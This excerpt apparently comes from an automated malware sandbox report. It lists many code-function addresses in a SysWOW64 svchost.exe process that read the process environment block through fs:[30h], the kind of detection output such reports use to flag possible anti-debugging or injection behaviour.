Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
